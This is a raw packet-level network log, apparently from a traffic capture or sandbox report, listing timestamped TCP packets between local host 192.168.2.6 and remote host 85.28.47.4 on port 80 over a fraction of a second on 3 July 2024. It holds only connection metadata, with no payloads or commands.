Jul 3, 2024 18:08:37.675971985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.675985098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.675991058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676018000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676088095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676099062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676110983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676135063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676151037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676208019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676218987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676261902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676326990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676337957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676347971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676358938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676369905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676378965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676381111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676393986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676414013 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676542997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676553965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676564932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676592112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676615953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676672935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676683903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676696062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676707029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676711082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676718950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676734924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676749945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676908016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676925898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676964045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.676973104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676984072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.676996946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677006960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677007914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677018881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677028894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677036047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677041054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677067041 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677078962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677253008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677264929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677275896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677288055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677295923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677300930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677311897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677311897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677323103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677335978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677354097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677476883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677490950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677529097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677562952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677575111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677580118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677589893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677602053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677611113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677613974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677623034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.677625895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.677653074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.728967905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.733880043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906506062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906528950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906544924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906572104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906584024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906594992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906606913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906641006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.906671047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906699896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906711102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906716108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906722069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906728029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906733990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906739950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906744957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906759977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.906815052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.906815052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.906835079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.906841993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907021999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907036066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907047987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907068968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907093048 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907202005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907228947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907241106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907253027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907264948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907269955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907277107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907288074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907298088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907299042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907310963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907311916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907334089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907349110 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907531023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907542944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907555103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907566071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907577038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907577991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907594919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907609940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907622099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907634020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907634974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907645941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907656908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907663107 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907669067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907680988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907691956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.907694101 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907715082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.907737970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908123016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908134937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908145905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908157110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908168077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908174038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908193111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908205032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908216000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908217907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908227921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908238888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908246040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908267975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908292055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908435106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908446074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908457041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908469915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908500910 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908515930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908571959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908593893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908603907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908616066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908624887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908632040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908641100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908642054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908653975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908664942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908672094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908675909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908688068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908689976 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908699989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908703089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908710957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908721924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.908735991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.908766985 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909279108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909290075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909301996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909312010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909322023 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909322977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909333944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909337997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909353018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909363985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909365892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909374952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909385920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909390926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909396887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909409046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909420013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909430027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909434080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909441948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909454107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909465075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909475088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909476042 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909476042 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909487009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909497976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909503937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909508944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909519911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909521103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909532070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.909538984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.909569025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910243034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910254955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910264969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910275936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910285950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910296917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910300970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910309076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910320044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910325050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910331011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910340071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910341978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910355091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910363913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910365105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910377979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910382986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910388947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910398960 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910401106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910413027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910424948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910424948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910434961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.910450935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910469055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.910818100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.911843061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.994926929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.994940996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.994954109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.994997978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995008945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995019913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995032072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995104074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995104074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995104074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995131016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995145082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995193005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995287895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995299101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995310068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995321989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995330095 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995333910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995345116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995357037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995366096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995397091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995553970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995565891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995578051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995589018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995601892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995606899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995611906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995621920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995626926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995634079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995644093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995655060 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995688915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995857954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995870113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995898008 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995924950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.995944023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995955944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995966911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995978117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995989084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.995992899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996000051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996011972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996018887 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996038914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996057034 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996196985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996398926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996408939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996419907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996431112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996434927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996442080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996453047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996464014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996464014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996474981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996489048 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996490955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996501923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996505022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996515989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996526003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996536016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996537924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996548891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996561050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996561050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996572971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996582031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996583939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.996609926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.996635914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997126102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997137070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997148037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997159004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997164965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997169971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997180939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997183084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997198105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997209072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997217894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997220039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997231007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.997232914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997243881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.997255087 CEST	80	49710	85.28.47.4	192.168.2.6
